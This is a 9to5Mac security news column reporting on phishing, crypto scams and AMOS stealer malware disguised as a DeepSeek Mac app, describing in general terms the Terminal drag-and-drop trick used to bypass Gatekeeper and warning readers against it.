9to5Mac Security Bite is exclusively brought to you by Mosyle,the only Apple Unified Platform. Making Apple devices work-ready and enterprise-safe is all we do. Our unique integrated approach to management and security combines state-of-the-art Apple-specific security solutions for fully automated Hardening & Compliance, Next Generation EDR, AI-powered Zero Trust, and exclusive Privilege Management with the most powerful and modern Apple MDM on the market. The result is a totally automated Apple Unified Platform currently trusted by over 45,000 organizations to make millions of Apple devices work-ready with no effort and at an affordable cost. Request your EXTENDED TRIAL today and understand why Mosyle is everything you need to work with Apple.Tired of hearing about DeepSeek yet? The China-based LLM chatbot beached itself onto the scene this week, dominating the tech news cycle and even taking #1 on the App Store, where it still sits as of writing. However, its rapid popularity has led to a wave of new phishing campaigns, investment scams, and macOS malware disguised as real DeepSeek applications. Heres the latest.Youre reading 9to5Mac Security Bite, where each week, I share insights on data privacy, discuss the latest vulnerabilities, and shed light on emerging threats within Apples vast ecosystem of over 2 billion active devices.Cyble, a leading cybersecurity solutions firm, has kept tabs on several new scams cashing in on DeepSeeks moment of fame. These include crypto scams, where cybercriminals are attempting to trick victims into scanning QR codes to compromise crypto wallets and even fake investment opportunities. Ive also seen several seemingly legitimate-looking DeepSeek Mac installs with convincing file names, but theres one problem: DeepSeek doesnt offer a Mac app.In addition to phishing and fake investment campaigns, cybercriminals are now distributing AMOS (or Atomic), one of macOSs most prolific types of stealer malware, in DMG install files, posing as a DeepSeek Mac application. Unlike other stealers, AMOS is written in Apples programming language Swift and can run on different CPUs, including Intel and Apple Silicon. This, in addition to its clever distribution model, is what makes AMOS so successful. The malware authors offer it as a subscription service for $1,000 per month.Fortunately, experts have done extensive dynamic and code-level analysis to understand how it works. When a user becomes infected, the malware will run scripts to establish a C2 server with the cybercriminals. This is used as a form of two-way communication with the victims Mac. Attackers will use it to issue commands and, more critically, to send extracted data back to them. This typically includes things like iCloud Keychain passwords, credit card information, sensitive files, browser-stored crypto wallet keys, etc.Luckily, with the release of macOS Sequoia, Apple took a proactive step to help keep Joe Shmoes from executing malware on their Macs. Users on Sequoia can no longer control-click to override Gatekeeper and open software that isnt signed or notarized by Apple. However, as I reported last year, hackers got around this by instructing users to drop the malicious code directly into the Terminal app.That same technique is being used here with the fake DeepSeek apps.Heres how the attack works:The victim installs the malicious disk image file (DMG) image from website, email, etc The attacker instructs the victim to open Terminal and, instead of right-clicking to install, they are asked to drag and drop the .file directly into the Terminal windowThe seemingly harmless DeepSeek.file is, in fact, full of malicious Bash scripts. Once dropped into the Terminal, it triggers its execution and a bad day for the victim(via @MarceloRivero)DeepSeek only offers iOS and Android apps. Any application that prompts you to drop files into Terminal is malicious.Further, as friendly advice, dont download or engage with DeepSeek at all. The LLM chatbot is located in China and, therefore, has to adhere to Chinese laws, which include heavy censorship and complete and total access to all data. Its a serious risk to your privacy and has the potential to fuel cyber-espionage campaigns against you in the future.I am curious to hear your thoughts. Are you worried about DeepSeeks privacy concerns?Follow Arin: LinkedIn, Threads, BlueSky, XMore in Apple securityDeepSeek privacy concerns have led to investigations being opened in both the US and Europe, and seen the app removed from the App Store in Italy. It seems likely the same will happen in other countriesSecurity researchers have discovered two flaws present in all current iPhones, iPads, and Macs as well as many earlier ones. The vulnerabilities, known as SLAP and FLOP, could potentially allow an attacker to see the current contents of your open web tabsA judge has limited FBI powers to trawl through data obtained from tech giants like Apple, Google, and ISPs under FISA (the Foreign Intelligence Surveillance Act)How hackers are still using Google Ads to spread malware. How, in 2025, can Google, with its DeepMind and deeper pockets, still allow this to happen?Add 9to5Mac to your Google News feed. FTC: We use income earning auto affiliate links. More.Youre reading 9to5Mac experts who break news about Apple and its surrounding ecosystem, day after day. Be sure to check out our homepage for all the latest news, and follow 9to5Mac on Twitter, Facebook, and LinkedIn to stay in the loop. Dont know where to start? Check out our exclusive stories, reviews, how-tos, and subscribe to our YouTube channel